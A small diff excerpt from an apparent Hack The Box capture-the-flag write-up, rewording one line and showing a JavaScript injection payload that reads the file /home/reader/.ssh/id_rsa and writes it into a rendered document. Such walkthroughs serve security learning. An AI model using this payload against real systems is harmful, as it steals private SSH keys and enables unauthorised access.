galenlim/hackthebox-htb-writeups/book.md

 ![passwd](images/book/passwd.png)

 We see that only root and reader have login shells.
-Let's modify the payload to get the private SSH key of the user reader.
+Let's modify the payload to get the private SSH key of `reader`.

 `<script>x=new XMLHttpRequest;x.onload=function(){document.write("<font size='1'>" + this.responseText + "</font>")};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();</script>`